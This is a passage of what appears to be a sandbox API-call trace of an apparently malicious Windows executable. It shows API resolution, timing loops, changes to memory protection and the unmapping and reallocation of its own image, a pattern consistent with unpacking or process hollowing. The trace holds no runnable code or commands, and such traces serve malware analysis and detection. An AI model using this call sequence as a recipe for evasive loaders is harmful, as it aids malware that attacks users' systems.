lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ea, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001eb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ec, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ed, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ee, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ef, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.514] GetLastError () returned 0x0 [0079.514] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001fa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.525] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0079.525] SetErrorMode (uMode=0x8001) returned 0x8001 [0079.525] GetProcAddress (hModule=0x759f0000, lpProcName="EnumResourceTypesA") returned 0x75a80efd [0079.526] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x408bc5, lParam=0x0) [0079.527] SetErrorMode (uMode=0x8001) returned 0x8001 [0079.527] LoadLibraryA (lpLibFileName="shell32") returned 0x75c50000 [0080.932] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.932] GetProcAddress (hModule=0x75c50000, lpProcName="Shell_NotifyIconA") returned 0x75e98af2 [0080.933] Shell_NotifyIconA (dwMessage=0x0, lpData=0x18f370) returned 1 [0080.964] Shell_NotifyIconA (dwMessage=0x2, lpData=0x18f370) returned 1 [0080.974] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77270000 [0080.974] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.974] GetProcAddress (hModule=0x77270000, lpProcName="ZwSetInformationProcess") returned 0x7728fb18 [0080.974] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0080.974] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.974] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0080.974] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.974] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0080.974] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.974] LoadLibraryA (lpLibFileName="user32") returned 0x75790000 [0080.974] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] GetProcAddress (hModule=0x75790000, lpProcName="GetDesktopWindow") returned 0x757b0a19 [0080.975] GetDesktopWindow () returned 0x10010 [0080.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0080.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] GetProcAddress (hModule=0x759f0000, lpProcName="HeapAlloc") returned 0x7729e026 [0080.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0080.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] GetProcAddress (hModule=0x759f0000, lpProcName="SetLastError") returned 0x75a011a9 [0080.975] SetLastError (dwErrCode=0x5) [0080.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0080.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0080.975] GetProcAddress (hModule=0x759f0000, lpProcName="SetErrorMode") returned 0x75a01b00 [0080.975] SetErrorMode (uMode=0x400) returned 0x8001 [0080.975] SetErrorMode (uMode=0x0) returned 0x400 [0080.975] SetErrorMode (uMode=0x8001) returned 0x0 [0080.975] LoadLibraryA (lpLibFileName="ntdll") returned 0x77270000 [0080.975] SetErrorMode (uMode=0x0) returned 0x8001 [0080.975] GetProcAddress (hModule=0x77270000, lpProcName="NtYieldExecution") returned 0x7728ff2c [0080.976] Sleep (dwMilliseconds=0xf) [0080.987] NtYieldExecution () returned 0x0 [0080.987] Sleep (dwMilliseconds=0xf) [0081.002] NtYieldExecution () returned 0x40000024 [0081.002] Sleep (dwMilliseconds=0xf) [0081.018] NtYieldExecution () returned 0x40000024 [0081.018] Sleep (dwMilliseconds=0xf) [0081.034] NtYieldExecution () returned 0x40000024 [0081.034] Sleep (dwMilliseconds=0xf) [0081.049] NtYieldExecution () returned 0x40000024 [0081.049] Sleep (dwMilliseconds=0xf) [0081.066] NtYieldExecution () returned 0x40000024 [0081.066] Sleep (dwMilliseconds=0xf) [0081.080] NtYieldExecution () returned 0x40000024 [0081.080] Sleep (dwMilliseconds=0xf) [0081.096] NtYieldExecution () returned 0x40000024 [0081.096] Sleep (dwMilliseconds=0xf) [0081.115] NtYieldExecution () returned 0x40000024 [0081.116] Sleep (dwMilliseconds=0xf) [0081.128] NtYieldExecution () returned 0x40000024 [0081.128] Sleep (dwMilliseconds=0xf) [0081.143] NtYieldExecution () returned 0x0 [0081.143] Sleep (dwMilliseconds=0xf) [0081.158] NtYieldExecution () returned 0x40000024 [0081.159] Sleep (dwMilliseconds=0xf) [0081.174] NtYieldExecution () returned 0x40000024 [0081.174] Sleep (dwMilliseconds=0xf) [0081.191] NtYieldExecution () returned 0x40000024 [0081.191] Sleep (dwMilliseconds=0xf) [0081.205] NtYieldExecution () returned 0x40000024 [0081.205] Sleep (dwMilliseconds=0xf) [0081.221] NtYieldExecution () returned 0x40000024 [0081.221] Sleep (dwMilliseconds=0xf) [0081.236] NtYieldExecution () returned 0x40000024 [0081.236] Sleep (dwMilliseconds=0xf) [0081.253] NtYieldExecution () returned 0x40000024 [0081.253] Sleep (dwMilliseconds=0xf) [0081.268] NtYieldExecution () returned 0x40000024 [0081.268] Sleep (dwMilliseconds=0xf) [0081.283] NtYieldExecution () returned 0x40000024 [0081.283] Sleep (dwMilliseconds=0xf) [0081.299] NtYieldExecution () returned 0x40000024 [0081.299] Sleep (dwMilliseconds=0xf) [0081.314] NtYieldExecution () returned 0x40000024 [0081.314] Sleep (dwMilliseconds=0xf) [0081.331] NtYieldExecution () returned 0x40000024 [0081.331] Sleep (dwMilliseconds=0xf) [0081.345] NtYieldExecution () returned 0x40000024 [0081.345] Sleep (dwMilliseconds=0xf) [0081.361] NtYieldExecution () returned 0x40000024 [0081.361] Sleep (dwMilliseconds=0xf) [0081.376] NtYieldExecution () returned 0x40000024 [0081.376] Sleep (dwMilliseconds=0xf) [0081.393] NtYieldExecution () returned 0x40000024 [0081.393] Sleep (dwMilliseconds=0xf) [0081.408] NtYieldExecution () returned 0x0 [0081.408] Sleep (dwMilliseconds=0xf) [0081.424] NtYieldExecution () returned 0x0 [0081.425] Sleep (dwMilliseconds=0xf) [0081.443] NtYieldExecution () returned 0x40000024 [0081.443] Sleep (dwMilliseconds=0xf) [0081.457] NtYieldExecution () returned 0x40000024 [0081.457] Sleep (dwMilliseconds=0xf) [0081.471] NtYieldExecution () returned 0x40000024 [0081.471] SetErrorMode (uMode=0x8001) returned 0x0 [0081.471] LoadLibraryA (lpLibFileName="ntdll") returned 0x77270000 [0081.472] SetErrorMode (uMode=0x0) returned 0x8001 [0081.472] GetProcAddress (hModule=0x77270000, lpProcName="NtProtectVirtualMemory") returned 0x77290028 [0081.472] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f53c*=0x77280000, NumberOfBytesToProtect=0x18f540, NewAccessProtection=0x40, OldAccessProtection=0x18f544 | out: BaseAddress=0x18f53c*=0x77280000, NumberOfBytesToProtect=0x18f540, OldAccessProtection=0x18f544*=0x20) returned 0x0 [0081.671] SetErrorMode (uMode=0x8001) returned 0x0 [0081.671] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.671] SetErrorMode (uMode=0x0) returned 0x8001 [0081.671] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileA") returned 0x75a053c6 [0081.671] SetErrorMode (uMode=0x8001) returned 0x0 [0081.672] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.672] SetErrorMode (uMode=0x0) returned 0x8001 [0081.672] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0081.672] SetErrorMode (uMode=0x8001) returned 0x0 [0081.672] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.672] SetErrorMode (uMode=0x0) returned 0x8001 [0081.672] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0081.672] SetErrorMode (uMode=0x8001) returned 0x0 [0081.672] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.672] SetErrorMode (uMode=0x0) returned 0x8001 [0081.672] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0081.672] SetErrorMode (uMode=0x8001) returned 0x0 [0081.672] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.672] SetErrorMode (uMode=0x0) returned 0x8001 [0081.672] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSize") returned 0x75a0196e [0081.672] SetErrorMode (uMode=0x8001) returned 0x0 [0081.672] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.672] SetErrorMode (uMode=0x0) returned 0x8001 [0081.672] GetProcAddress (hModule=0x759f0000, lpProcName="UnmapViewOfFile") returned 0x75a01826 [0081.673] SetErrorMode (uMode=0x8001) returned 0x0 [0081.673] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.673] SetErrorMode (uMode=0x0) returned 0x8001 [0081.673] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualProtectEx") returned 0x75a845bf [0081.673] SetErrorMode (uMode=0x8001) returned 0x0 [0081.673] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.674] SetErrorMode (uMode=0x0) returned 0x8001 [0081.674] GetProcAddress (hModule=0x759f0000, lpProcName="GetLongPathNameA") returned 0x75a8437f [0081.674] SetErrorMode (uMode=0x8001) returned 0x0 [0081.674] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.674] SetErrorMode (uMode=0x0) returned 0x8001 [0081.674] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateProcess") returned 0x75a1d802 [0081.674] SetErrorMode (uMode=0x8001) returned 0x0 [0081.674] LoadLibraryA (lpLibFileName="IPHlpApi") returned 0x74920000 [0081.790] SetErrorMode (uMode=0x0) returned 0x8001 [0081.791] GetProcAddress (hModule=0x74920000, lpProcName="GetAdaptersInfo") returned 0x74929263 [0081.791] SetErrorMode (uMode=0x8001) returned 0x0 [0081.791] LoadLibraryA (lpLibFileName="kernel32") returned 0x759f0000 [0081.791] SetErrorMode (uMode=0x0) returned 0x8001 [0081.791] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0081.791] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0081.791] GetAdaptersInfo (in: AdapterInfo=0x290000, SizePointer=0x18f54c | out: AdapterInfo=0x290000, SizePointer=0x18f54c) returned 0x0 [0081.960] SetErrorMode (uMode=0x8001) returned 0x0 [0081.960] LoadLibraryA (lpLibFileName="shell32") returned 0x75c50000 [0081.962] SetErrorMode (uMode=0x0) returned 0x8001 [0081.962] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteA") returned 0x75e97078 [0081.962] SetErrorMode (uMode=0x8001) returned 0x0 [0081.962] LoadLibraryA (lpLibFileName="User32") returned 0x75790000 [0081.963] SetErrorMode (uMode=0x0) returned 0x8001 [0081.963] GetProcAddress (hModule=0x75790000, lpProcName="EnumWindows") returned 0x757ad1cf [0081.963] EnumWindows (lpEnumFunc=0x573ef2, lParam=0x18f5f0) returned 1 [0081.964] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x8000000, flAllocationType=0x3000, flProtect=0x40) returned 0x35a0000 [0081.970] SetErrorMode (uMode=0x8001) returned 0x0 [0081.970] LoadLibraryA (lpLibFileName="user32") returned 0x75790000 [0081.970] SetErrorMode (uMode=0x0) returned 0x8001 [0081.970] GetProcAddress (hModule=0x75790000, lpProcName="DestroyWindow") returned 0x757a9a55 [0081.970] SetErrorMode (uMode=0x8001) returned 0x0 [0081.970] LoadLibraryA (lpLibFileName="user32") returned 0x75790000 [0081.970] SetErrorMode (uMode=0x0) returned 0x8001 [0081.970] GetProcAddress (hModule=0x75790000, lpProcName="EnumThreadWindows") returned 0x757b3961 [0081.970] EnumThreadWindows (dwThreadId=0x8ec, lpfn=0x57401d, lParam=0x757a9a55) returned 0 [0081.970] DestroyWindow (hWnd=0x20216) returned 1 [0081.970] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0081.971] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0081.971] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0081.971] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0081.972] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0081.973] SetErrorMode (uMode=0x8001) returned 0x0 [0081.973] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.973] SetErrorMode (uMode=0x0) returned 0x8001 [0081.973] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateThread") returned 0x75a07a2f [0081.973] SetErrorMode (uMode=0x8001) returned 0x0 [0081.973] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.973] SetErrorMode (uMode=0x0) returned 0x8001 [0081.974] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryA") returned 0x75a049d7 [0081.974] SetErrorMode (uMode=0x8001) returned 0x0 [0081.974] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.974] SetErrorMode (uMode=0x0) returned 0x8001 [0081.974] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteFileW") returned 0x75a089b3 [0081.974] SetErrorMode (uMode=0x8001) returned 0x0 [0081.974] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.974] SetErrorMode (uMode=0x0) returned 0x8001 [0081.974] GetProcAddress (hModule=0x759f0000, lpProcName="HeapReAlloc") returned 0x772b1f6e [0081.974] SetErrorMode (uMode=0x8001) returned 0x0 [0081.974] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.974] SetErrorMode (uMode=0x0) returned 0x8001 [0081.974] GetProcAddress (hModule=0x759f0000, lpProcName="GetNativeSystemInfo") returned 0x75a110b5 [0081.974] SetErrorMode (uMode=0x8001) returned 0x0 [0081.974] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.974] SetErrorMode (uMode=0x0) returned 0x8001 [0081.975] GetProcAddress (hModule=0x759f0000, lpProcName="CreateThread") returned 0x75a034d5 [0081.975] SetErrorMode (uMode=0x8001) returned 0x0 [0081.975] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.975] SetErrorMode (uMode=0x0) returned 0x8001 [0081.975] GetProcAddress (hModule=0x759f0000, lpProcName="HeapAlloc") returned 0x7729e026 [0081.975] SetErrorMode (uMode=0x8001) returned 0x0 [0081.975] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.975] SetErrorMode (uMode=0x0) returned 0x8001 [0081.975] GetProcAddress (hModule=0x759f0000, lpProcName="HeapDestroy") returned 0x75a035b7 [0081.975] SetErrorMode (uMode=0x8001) returned 0x0 [0081.975] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.975] SetErrorMode (uMode=0x0) returned 0x8001 [0081.975] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0081.975] SetErrorMode (uMode=0x8001) returned 0x0 [0081.975] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.975] SetErrorMode (uMode=0x0) returned 0x8001 [0081.975] GetProcAddress (hModule=0x759f0000, lpProcName="LocalFree") returned 0x75a02d3c [0081.975] SetErrorMode (uMode=0x8001) returned 0x0 [0081.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.976] SetErrorMode (uMode=0x0) returned 0x8001 [0081.976] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteCriticalSection") returned 0x772a45f5 [0081.976] SetErrorMode (uMode=0x8001) returned 0x0 [0081.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.976] SetErrorMode (uMode=0x0) returned 0x8001 [0081.976] GetProcAddress (hModule=0x759f0000, lpProcName="GetComputerNameW") returned 0x75a0dd0e [0081.976] SetErrorMode (uMode=0x8001) returned 0x0 [0081.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.976] SetErrorMode (uMode=0x0) returned 0x8001 [0081.976] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcessHeap") returned 0x75a014e9 [0081.976] SetErrorMode (uMode=0x8001) returned 0x0 [0081.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.976] SetErrorMode (uMode=0x0) returned 0x8001 [0081.976] GetProcAddress (hModule=0x759f0000, lpProcName="SystemTimeToFileTime") returned 0x75a05a7e [0081.976] SetErrorMode (uMode=0x8001) returned 0x0 [0081.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.977] SetErrorMode (uMode=0x0) returned 0x8001 [0081.977] GetProcAddress (hModule=0x759f0000, lpProcName="GlobalMemoryStatusEx") returned 0x75a2d4c4 [0081.977] SetErrorMode (uMode=0x8001) returned 0x0 [0081.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.977] SetErrorMode (uMode=0x0) returned 0x8001 [0081.977] GetProcAddress (hModule=0x759f0000, lpProcName="CreateProcessW") returned 0x75a0103d [0081.977] SetErrorMode (uMode=0x8001) returned 0x0 [0081.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.977] SetErrorMode (uMode=0x0) returned 0x8001 [0081.977] GetProcAddress (hModule=0x759f0000, lpProcName="WideCharToMultiByte") returned 0x75a0170d [0081.977] SetErrorMode (uMode=0x8001) returned 0x0 [0081.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.977] SetErrorMode (uMode=0x0) returned 0x8001 [0081.977] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedIncrement") returned 0x75a01400 [0081.977] SetErrorMode (uMode=0x8001) returned 0x0 [0081.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.977] SetErrorMode (uMode=0x0) returned 0x8001 [0081.978] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemTime") returned 0x75a05a96 [0081.978] SetErrorMode (uMode=0x8001) returned 0x0 [0081.978] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.978] SetErrorMode (uMode=0x0) returned 0x8001 [0081.978] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFreeEx") returned 0x75a1d9c8 [0081.978] SetErrorMode (uMode=0x8001) returned 0x0 [0081.978] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.978] SetErrorMode (uMode=0x0) returned 0x8001 [0081.978] GetProcAddress (hModule=0x759f0000, lpProcName="IsBadReadPtr") returned 0x75a2d075 [0081.978] SetErrorMode (uMode=0x8001) returned 0x0 [0081.978] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.978] SetErrorMode (uMode=0x0) returned 0x8001 [0081.978] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiW") returned 0x75a1d5cd [0081.978] SetErrorMode (uMode=0x8001) returned 0x0 [0081.978] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.978] SetErrorMode (uMode=0x0) returned 0x8001 [0081.978] GetProcAddress (hModule=0x759f0000, lpProcName="OpenMutexW") returned 0x75a05151 [0081.978] SetErrorMode (uMode=0x8001) returned 0x0 [0081.979] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.979] SetErrorMode (uMode=0x0) returned 0x8001 [0081.979] GetProcAddress (hModule=0x759f0000, lpProcName="SetEndOfFile") returned 0x75a1ce2e [0081.979] SetErrorMode (uMode=0x8001) returned 0x0 [0081.979] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.979] SetErrorMode (uMode=0x0) returned 0x8001 [0081.979] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThread") returned 0x75a017ec [0081.979] SetErrorMode (uMode=0x8001) returned 0x0 [0081.979] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.979] SetErrorMode (uMode=0x0) returned 0x8001 [0081.979] GetProcAddress (hModule=0x759f0000, lpProcName="FlushFileBuffers") returned 0x75a0469b [0081.979] SetErrorMode (uMode=0x8001) returned 0x0 [0081.979] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.979] SetErrorMode (uMode=0x0) returned 0x8001 [0081.979] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x772e5f41 [0081.979] SetErrorMode (uMode=0x8001) returned 0x0 [0081.979] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0081.980] SetErrorMode (uMode=0x0) returned 0x8001 